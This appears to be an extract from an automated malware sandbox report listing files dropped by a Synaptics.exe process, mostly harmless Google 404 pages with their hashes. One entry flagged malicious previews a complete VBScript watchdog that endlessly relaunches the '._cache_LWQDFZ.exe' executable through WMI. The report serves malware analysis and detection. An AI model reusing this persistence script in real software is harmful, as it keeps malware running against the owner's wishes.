                                                                                                                    MD5:6E7261E9AEE4D28A152FB3F44E05C2F3
                                                                                                                    SHA1:3727AAD1BDD021915454503BD17B52CCDF9C43BC
                                                                                                                    SHA-256:F3713B4F6970FE0558D52C3CFC2CFFC3195654E38E50B33E91815AC1838570D3
                                                                                                                    SHA-512:95D5F5038E9F8397A53D393960E2C1A969949C3969E88CE72522D3D724EE50D177319C8D67ED39420393485550940A83B2EA187219FA6BD011717AB88FD8D00F
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CByQaAIfrXI9_xuL2GWUlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255192591586912
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                    MD5:A69BA5669B58E193B0EDB540FCDC6EB7
                                                                                                                    SHA1:EB25FA28BBF0FB125FFF1D0913A378753C5DB2C5
                                                                                                                    SHA-256:C9AB443727D6BA425A97C65EC53C3FA7A6CB7A5A78C8305A9B9C74C27DDCE8E1
                                                                                                                    SHA-512:F9B70DDF27B0A5FF267655D9568BF6DDDBB7422E09117B44C9026AE8EFD6EAB7D409A80E08C23AADA96BCDBE894F00BA76D506A3FEC6C9431ECCCFDEAB2F9A5B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273017315600478
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0fU8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t8+pAZewRDK4mW
                                                                                                                    MD5:BD26F2F6AD90F71D3579B269FA5E6E07
                                                                                                                    SHA1:8A3F0A435A11DFD0BAED604BC07E18D8FF546A36
                                                                                                                    SHA-256:AF63C8ECCEC0F0A63D9574F934E3B50362C420951F6E6FA4031AF94278508031
                                                                                                                    SHA-512:5CBEE5F9DBAC50BC4909A12BB11A779016D63FF0AEF2CD746267B8418CE19521B39F8E59D4D791DC6F446603B9A09B22361B540695F4F1E6813DA34777DC6FA8
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255316766133396
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                    MD5:4E192197D779BD29594691146B58FC0C
                                                                                                                    SHA1:870446E7415397F38E749F2990C55B1E9DCB2356
                                                                                                                    SHA-256:8A750A40338610259C9967577D9EF2C1EC1B93B49EF49592183BF06D9EBEC38A
                                                                                                                    SHA-512:3188C4A7EED382E2BE3DEE64503D1595F7967A095D1EBDF8F30273C8265EF303D85B2B1BD16ABED36306D68C21424DE1C10BBCEACAAEFCCF029D8C824A193A27
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260657619744371
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0fDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                    MD5:7E617261F57EA9070F9133660B820FAA
                                                                                                                    SHA1:03A9FA362688717D4CEA8D3C28DDB3C626FDCA49
                                                                                                                    SHA-256:44EAE7FF95E45D9877E3ECDCC678B68E42EB81DA4C2F8E4488BDC34F95477E89
                                                                                                                    SHA-512:2D55A5287DADA47B7E4B1FA119C6EB2A2E6C75923FEC4DF55985B409BC95D299C7FC6E61D2942C610D3775193B0465FD50CD8A77A910423687634ED63E111128
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260761270390487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0hrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                                                    MD5:475A26D8E7F0954F2CDDA76D57089E33
                                                                                                                    SHA1:078FA8390AD6B89DD573037023017B93BFEF23AC
                                                                                                                    SHA-256:6E573E012A0F6B34D4DF37D75B17C83055B6B0E545DA2996A3F7685D109AC18C
                                                                                                                    SHA-512:685B4B02F77157F97A772EDED889DE25F9061AB58C42758BEB74B0A8D3C28B37D39F43C91FE8BB75BD22D8F8EA9E2FB084DDD4CC439771A3F6F3334FC0859CCC
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.259042962817581
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                                    MD5:332D685A09337771AB0BBBF4555EB8E4
                                                                                                                    SHA1:7857D2C677B35408612EDEE1D58F1DE2214AC410
                                                                                                                    SHA-256:FE0053F34A2B277521DB87786AF4F7AEB95178038E6841EE00FE24AA7A7A2DAA
                                                                                                                    SHA-512:E9F349F198E77CD94EDBB0CBE41BE6AD13804ADF3DFFD638500BF7616BB2C49323BD027630D0FB2F6F656247B27239391EE456BD5CF8E8FA4FCFEB8224AC4AC5
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.268417303517373
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
                                                                                                                    MD5:0EA63AE4E34197209D504C9551A32AD0
                                                                                                                    SHA1:F3D579E7FBD03DB20EF43C378CECC4EF6C7585BF
                                                                                                                    SHA-256:6395EA50A78F8CC29C08E1391C94FD5940CEFD356D42844B5A30CF9BEE2ED20B
                                                                                                                    SHA-512:399C603CA9F3FFFAC83FF1E60C9005D44B5C8BD7BAC549894FEA8DFCF043FCBD884FBA88ADA5984B156DD03F9B817E0777E107458CF0DEB79A1CEFB26EEFDE3B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.266838314462909
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                    MD5:6D853574CF1192CCFF0B14370BA2F5E3
                                                                                                                    SHA1:0ED150B46A9B7AB956194B10DD5A53B331398E04
                                                                                                                    SHA-256:4B2E98EC05CD63A9C1DEC330ADDA422D2E6B188CC1AB964021ADD27CFE2C23B8
                                                                                                                    SHA-512:E65A1AAC5E67EFA6CEF3346103CC1A3186B70C3296191D40649B60868F36800DE5203A387A03B1BDB1391AE0A315B583D2D5DEF45836CCE8D6FAE23116AA0A3B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.265605279404806
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
                                                                                                                    MD5:5E225EDC8865E60FE789E89CA277BD52
                                                                                                                    SHA1:987CB273716042BCB821CCEB3262207D2639EF13
                                                                                                                    SHA-256:6B3465F9EB739A7F9C50F6F8721E46245F01C9E637A9ED10A706703EBA3B2B16
                                                                                                                    SHA-512:9C971F6DC56715F1F76E8BB316E76A8E176BA61114AF4D5741B53E1365EB5130C6A46CB666F92947580ED729BAE9C1D253F467CFB83C6F4209E3549B71F66DFA
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.265680611044739
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0YDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                    MD5:FBCF20954F9B9FEC940DC8BA9433895D
                                                                                                                    SHA1:480F49B87F4AE50C205EA6F0C43D5063F08ECD57
                                                                                                                    SHA-256:D5E8C2BEF982EA67851682F45C689052F94B11BC149A36EB8692CDB059631446
                                                                                                                    SHA-512:F29B5DD8816DFE67A416FDE1C87D65C60E5C711865BAF6FABA2DFDB9471523E4E8C21BDD3D594E8F9E8B79D49747CE0B43177F5A97A971AE39ED377371BE80AF
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255761562464222
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++t+pAZewRDK4mW
                                                                                                                    MD5:7C3C0B0F0F71B97A6C8C5DFCFCC61068
                                                                                                                    SHA1:4EA1113B95C0B26278A9CB0E1A321648AF23BC51
                                                                                                                    SHA-256:D133031CB07D81A411C76A341AB357B4858732B18C3871000657F51045804552
                                                                                                                    SHA-512:1BEFE318CDE5D8FEE6C8ED5F469DA6408A0FB12A7D30ECD93849EBC2196A0B32FA2C39FA1E8809073E1DF53B53727156798768CAC72AAFB08573F8898F6DE8D4
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.262653351843568
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0FESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+eE+pAZewRDK4mW
                                                                                                                    MD5:BF2AA6841F30090A7E966946A042B5D5
                                                                                                                    SHA1:3715FECC459E2871766B9D8D262D0877D1B96DD5
                                                                                                                    SHA-256:EBA97D9E919078255A5F9F132FA3D4E8EB84449536158563B2A0B99D4631F563
                                                                                                                    SHA-512:6328ABA9C5D9D781581780224F22631FBFD293BF69E0C2718AE48AB287772C78EADFB8F6549C683F9FC7B308C82C5BD0B5A32C317BE09A3054A2C2DE92188A5B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.250031731574487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0uDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xD+pAZewRDK4mW
                                                                                                                    MD5:A401FDA8805AD8F6C3E9936A49A83577
                                                                                                                    SHA1:189CE0CE13D04B07A2E5A43658B72D0FB66F79F7
                                                                                                                    SHA-256:AAB2C68AEBD86AF0677B77D735111ECBAA9400226AEB547FD38610AC7C362633
                                                                                                                    SHA-512:795A4F529CD60AB9577D6353B9D93D639AC4782469771991D0094E59B77DF16034F0EE7D2A5183DB30F5972776DB5338107AD6A5F2AFF631965D6C6F088306A3
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.261028674849901
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                    MD5:F5454A187C714CB63DDCC0C5DB593ED2
                                                                                                                    SHA1:410BF3029544F8923EDC31DC07884D3C1A38D77C
                                                                                                                    SHA-256:7259F4A224698A1467408549ED200C948C0C9BAF86DD4F02AB7C97671E8E953A
                                                                                                                    SHA-512:93AE2C411C23A6369D814E8B0486F294094D99BCA475ABD8FEA1080B0C09344B43E268669381223F80C95B9184980B338740E00BD810BD713D4E072FE016C2C0
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273382493770325
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0QyctSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+HT+pAZewRDK4mW
                                                                                                                    MD5:93BC70C1ED14F3EBF3CC31591DD9F6B0
                                                                                                                    SHA1:A359BF8BFBC569F7BCDE774C13F95998EC2ACBA8
                                                                                                                    SHA-256:CB689856AC92A0E2515DD7F63742C942158224A290C32C70FAF1B11BF4DC3436
                                                                                                                    SHA-512:D78434FBFAE7DAC1B696C6227D09F6E89F4F425DAFCAA6EA4F686456E267135CD8E6AE961452F422028E09C06F62CF10614C0250A8E779E2DD391A2D562E5BB0
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.253159941975945
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+01HKJSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+SqJ+pAZewRDK4mW
                                                                                                                    MD5:3DF80A51DD8C4BCB5DAE622632A6D818
                                                                                                                    SHA1:72E2E726F93DE2F7D54E7D9A3331109E89F92230
                                                                                                                    SHA-256:8F4A61CFAD3FA336BB21C75534E53122C8B7886EF50037A92897A525E0AD93D2
                                                                                                                    SHA-512:7483274137C12ADAB8299450BABD3F3F990F631F5700CEE2090BA7C7D89F9A12383AD4BB5C070880E69771ACB62EC333E53BE70A153B0A09CA1024407E2D9C4F
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2535803832393935
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                    MD5:73E8D61A123D985F4A0647886C047928
                                                                                                                    SHA1:4BAEE8061EF6825A8C35EF0801D2B452C66199B7
                                                                                                                    SHA-256:6AA2C53B2C84673567834FE0F43DE0403233A23904FB2C0B7958AE211DED991E
                                                                                                                    SHA-512:2373FFAE59841DB34509B65B8208EC62A6CFCF9A06EFFAB1177202CDB9090D332460CA7FF526D7171CCB972FD31CE45604CA1E2654809E9F60FA246D356AB3C1
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.273347789255024
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BngSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sg+pAZewRDK4mW
                                                                                                                    MD5:0403879ABC18F0F2523B76A42C326A29
                                                                                                                    SHA1:C17C709F6314D99A2A879673FD2BC1592803C0D2
                                                                                                                    SHA-256:7C555D3091C207FBB9C4320ADD70A3B1CE0D041D49012AE1C16F20AC842175EA
                                                                                                                    SHA-512:81114F1DAE21B9315B7881431984DA9B77A353C2368F8759609753727121B2BEA9C3514AE210EE0FFD35774BC614703DB4D6B2C666A4669228E6A19F7037308B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.26475663829633
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                    MD5:CBDFD59D825EAB4E5972629D2657E4F6
                                                                                                                    SHA1:231C066A3A047F1B303E398308817A7ABA4A1280
                                                                                                                    SHA-256:0EAC914FE24BF422661C78E7860DC7FDB71C5F54A7FA23D98DA6D9509EA0E0CF
                                                                                                                    SHA-512:A57AF8B9E4C24BA8F8191EAB6A50596AF74548EBBBFA322EEDBCA651D49C67FB2B1BDECFB0C75EBC0DB7A8D2990AA9ABACE4BB01E651EC005F4C7296FBB5284E
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2551633949359084
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0sISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hI+pAZewRDK4mW
                                                                                                                    MD5:CE3C4716056587A8C6FE3106756729C4
                                                                                                                    SHA1:6A4470F75F56A2E2CE45BEB4539266739543BF5B
                                                                                                                    SHA-256:87B5EDC3EFBEAC7D06BF106DBDF0F4C525B6768128282C07C00790E3FC7BE9B8
                                                                                                                    SHA-512:ED6E9FD3CF6992386DD977555558E0A07021C1AC48D3E1002566718724BAE906421153D9FE371FA980D0D9DBFDF3FB55EEDFC70C5B805C3C8276DFF7299CA970
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.255588331393292
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+01zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Sz+pAZewRDK4mW
                                                                                                                    MD5:C074C4549D60541BE67C31162A165BC7
                                                                                                                    SHA1:7CCD54A757ECE656E3FEBFD7A30767A438990342
                                                                                                                    SHA-256:EE775E64FBB23B0F6437656C1724EE16B01434D791974DE114FD19261E634608
                                                                                                                    SHA-512:0DE3DEF12BB45989710B9C6EA51835B727B685427B40C61C94EC94A34F49FE3CA79FCEB90E7C0630375E64702D4B954213E571A88C229AC80F624697A0B73F91
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.26352265631552
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0t0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U0z+pAZewRDK4mW
                                                                                                                    MD5:02A8FCE3FEEC70E62DA45767F3CFB6C9
                                                                                                                    SHA1:7A5564BE070CFD3C5ABF857DE748C700F444BBFA
                                                                                                                    SHA-256:7256FE238292BE4EF75DA79A60E3F15955A1C3C0A9469AFEAE3342782DB98FBC
                                                                                                                    SHA-512:B642D97B30E17AE4A3444CB89CB037272FFE50291315783379E6592F4C50659D5CA8E97E2B3C0AA22C18F8C04C57D974F93D3BC2F75A0783E9FDC4D9B0898F24
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.261964419822244
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                    MD5:72D34A0D4DB3178CEC7D56DDF182A5A2
                                                                                                                    SHA1:00CE5BA460D5431FAEEDA9DF0F201EF41F910FF2
                                                                                                                    SHA-256:00D11CF9227B478D3403ED41E8C63267FE70B9E2737F1581808B3DEE5584F6E4
                                                                                                                    SHA-512:21B4EEADBB1D962CF32063596A6C79395173C579E875C84E886CD4124D5167EB5B3834A0C4160016D5576428A223705D20F79FC217B465C520251586BD169216
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):836
                                                                                                                    Entropy (8bit):5.359914217000316
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:dF/UFXOHU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFzt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                    MD5:0F33CF0E06EA6172629A11C48A0B0944
                                                                                                                    SHA1:E87E8883A8E99AEFB45D3FFF7EB625C5C3EDA988
                                                                                                                    SHA-256:2ED8C8B807212F557F8431199DC44524D2DC9BF708516330396383C1D4C897CC
                                                                                                                    SHA-512:B1673ED2949738761C0EBAF6CD3D68344E5C88E594CA193B0CDF61FDF7DD0C0C142280A132A0E678FF525FFA5A5B4385595D01A1F5FCD6E431F03ADDEA161C4F
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_LWQDFZ.exe"..fileset = """C:\Users\user\Desktop\._cache_LWQDFZ.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2629620986565495
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+04NzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                    MD5:41803DC9F3D36D157F48FC8B64452E33
                                                                                                                    SHA1:F83D4301A9B546F5109FDBF3CA6429CE96CE9A20
                                                                                                                    SHA-256:7DB96E9B4A8AE9AFC92E9E5034DE63047D6D5D4E3CCCA53FDC0EAF211B59DCED
                                                                                                                    SHA-512:C54FF8C2BA496501877671A6EFC2A2BC4513A8213CADD17D6F661DEBA1FD00F83451297AB3D5D8C09FC9CC7A767AF7638B14937FE54890D89DD617FF5A30BDB0
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263570425164924
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0OpzDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
                                                                                                                    MD5:0B4E9C7BD1DB985BCE7AAFEF3C3D621A
                                                                                                                    SHA1:0F20E5F47ABFA2308312364E656ABA8C83C1B75C
                                                                                                                    SHA-256:0E8795D381E9BBB72D51846837B1E169E5CA69DE35B1DF022DAF0459911C202A
                                                                                                                    SHA-512:172A6B7C8D48D76D8F0449EDD3AB61C6E7C02F95DB75F35624E911A6838E8C812852555165F63880FDD0676936DE1AE0AC9971A66823030D91D3192ECD4E5382
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.279845415583851
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                    MD5:AD462FE607A0A1C7E5F6D244051117E6
                                                                                                                    SHA1:5F08877F4ADEC5058E82E80CEFB906B9F9969E9A
                                                                                                                    SHA-256:5052B2F44B24451C08FBE4CB3FAE6982E32B42556277FBC02A76DAAE1B364CDF
                                                                                                                    SHA-512:57A236A633808E61356C718E8BED52AAFCE4C92030A84400AEFE8D417E7552766FD71D4EEDF7B4EFB3D9C7E2309C9DDF0A28F04924F493AA83E45BB5456EE8F7
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2541770629430165
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0WRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                    MD5:B1DEDE25A1B71A3D647FF9222A0671CD
                                                                                                                    SHA1:5E1F8108302B1F51B34A32C091B42AC8E25FB30D
